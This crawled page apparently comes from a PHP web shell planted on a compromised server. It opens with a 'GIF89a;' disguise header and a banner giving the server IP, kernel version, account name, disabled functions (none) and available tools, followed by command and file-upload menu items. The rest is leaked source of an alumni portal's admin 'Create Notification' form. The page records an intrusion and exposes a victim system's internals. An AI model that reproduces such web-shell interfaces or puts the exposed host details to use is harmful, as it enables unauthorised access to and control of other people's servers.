GIF89a;
Server IP : 172.26.0.195 / Your IP : 18.117.232.215 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../css/../alumni/application/views/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Create Notification :: <?php echo $this->session->userdata("branchData")["branch_short_name"]; ?> | Alumni Portal</title> <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/style-liberty.css"); ?>"> <link rel="image icon" href="<?php echo base_url("/assets/images/logo.png"); ?>"> <link href="https://fonts.googleapis.com/css?family=Nunito:300,400,600,700,800,900&display=swap" rel="stylesheet"> <script src="<?php echo base_url("assets/admin/js/jquery-1.10.2.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/bootstrap.min.js"); ?>"></script> <link href="<?php echo base_url("assets/css/jquery-ui.css"); ?>" rel="stylesheet"> <script src="<?php echo base_url("assets/js/jquery-ui.js") ?>"></script> </head> <body class="sidebar-menu-collapsed"> <?php $this->load->view("admin/navAndHeader"); ?> <!-- main content start --> <div class="main-content"> <!-- content --> <div class="container-fluid content-top-gap"> <nav aria-label="breadcrumb"> <ol class="breadcrumb my-breadcrumb"> <li class="breadcrumb-item"><a href="<?php echo site_url("admin/Dashboard") ?>">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Notification</li> <li class="breadcrumb-item active" aria-current="page"><a href="">Create Notification</a></li> </ol> </nav> <div class="col-xl-12 pr-xl-2"> <div class="card card_border p-md-4"> <div class="card-body"> <!-- form --> <?php echo form_open_multipart(site_url("admin/Notification/saveNotification")); ?> <div class="register__header text-center mb-lg-5 mb-4"> <h3 class="register__title mb-2"> Create Notification</h3> </div> <?php if (validation_errors() != false) { ?> <div class="alert alert-danger"> <strong><?php echo validation_errors(); ?></strong> </div> <?php } ?> <?php if ($this->session->flashdata('successMessage')) { ?> <div class="alert alert-success"> <strong><?php echo $this->session->flashdata('successMessage'); ?> </strong> </div> <?php } ?> <?php if ($this->session->flashdata('errorMessage')) { ?> <div class="alert alert-danger"> <strong><?php echo $this->session->flashdata('errorMessage'); ?></strong> </div> <?php } ?> <div class="row"> <div class="col-xl-6"> <div class="form-group"> <label for="title" class="input__label required">Title</label> <input type="text" value="<?php echo set_value("title"); ?>" name="title" id="title" class="form-control login_text_field_bg input-style" aria-describedby="title" placeholder="Enter Title" s> </div> <div class="form-group"> <label for="occasion" class="input__label required">Occassion/Festival Name</label> <input type="text" value="<?php echo set_value("occasion"); ?>" name="occasion" id="occasion" class="form-control login_text_field_bg input-style" aria-describedby="occasion" placeholder="Enter Occasion" > </div> <div class="form-group input-group"> <span class="input-group-text" id="basic-addon1">URL : http://</span> <input type="text" value="<?php echo set_value("url"); ?>" name="url" id="url" class="form-control login_text_field_bg input-style" aria-describedby="url" placeholder="Enter URL" > </div> <div class="form-group"> <label for="schedule_date" class="input__label required">Schedule Date</label> <input type="text" readonly="readonly" value="<?php echo set_value("schedule_date"); ?>" name="schedule_date" id="schedule_date" class="form-control login_text_field_bg input-style" aria-describedby="schedule_date" placeholder="Select Schedule Date"> </div> </div> <div class="col-xl-6"> <div class="form-group"> <label for="photo" class="input__label ">Attachment Photo</label> <input type="file" value="<?php echo set_value("occassion"); ?>" name="photo" id="photo" class="form-control login_text_field_bg input-style" aria-describedby="photo" placeholder="Choose An Image" > </div> <div class="form-group"> <label for="icon" class="input__label ">Choose Icon</label> <input type="file" value="<?php echo set_value("occassion"); ?>" name="icon" id="icon" class="form-control login_text_field_bg input-style" aria-describedby="icon" placeholder="Choose An Image" > </div> <div class="form-group"> <label for="for" class="input__label required">Notification For</label> <select value="<?php echo set_value("content"); ?>" name="for" id="for" class="form-control login_text_field_bg input-style" aria-describedby="for"> <option selected disabled="true">-For-</option> <option <?php echo set_select("for", "Student"); ?> value="Student">Student</option> <option <?php echo set_select("for", "Alumni"); ?> value="Alumni">Alumni</option> <option <?php echo set_select("for", "Both"); ?> value="Both">Both</option> </select> </div> <div class="form-group"> <label for="type" class="input__label required">Notification Type</label> <select name="type" id="type" class="form-control login_text_field_bg input-style" aria-describedby="type"> <option selected disabled="true">-Type-</option> <option <?php echo set_select("type", "S"); ?> value="S">Special</option> <option <?php echo set_select("type", "G"); ?> value="G">General</option> <option <?php echo set_select("type", "F"); ?> value="F">Festival Wish</option> <option <?php echo set_select("type", "M"); ?> value="M">Marriage Anniversary</option> <option <?php echo set_select("type", "B"); ?> value="B">Birthday Wish</option> </select> </div> </div> </div> <div class="row"> <div class="col-xl-12"> <div class="form-group"> <label for="content" class="input__label required">Content</label> <textarea name="content" id="content" class="form-control login_text_field_bg input-style" aria-describedby="content" placeholder="Enter Content" ><?php echo set_value("content"); ?></textarea> </div> </div> </div> <div class="d-flex align-items-center flex-wrap justify-content-center"> <button type="submit" class="btn btn-primary btn-block btn-style mt-2">CREATE</button> </div> <br> <span style="color:red;">(*) marked fields are mandatory.</span> <?php echo form_close(); ?> <!-- //form --> </div> </div> </div> </div> <!-- //content --> </div> </div> <!-- main content end--> <?php $this->load->view("admin/footer"); ?> <script > $("#schedule_date").datepicker({ dateFormat: "dd/mm/yy", changeMonth: true, changeYear: true, numberOfMonths: 1, minDate: 0, maxDate: "+1M" }); $(document).ready(function () { document.getElementById("dashboard").classList.remove("active"); document.getElementById("dataManagement").classList.remove("active"); document.getElementById("admin").classList.remove("active"); document.getElementById("notification").classList.remove("active"); document.getElementById("reports").classList.remove("active"); document.getElementById("adminManagement").classList.remove("active"); document.getElementById("notification").classList.add("active"); }); </script>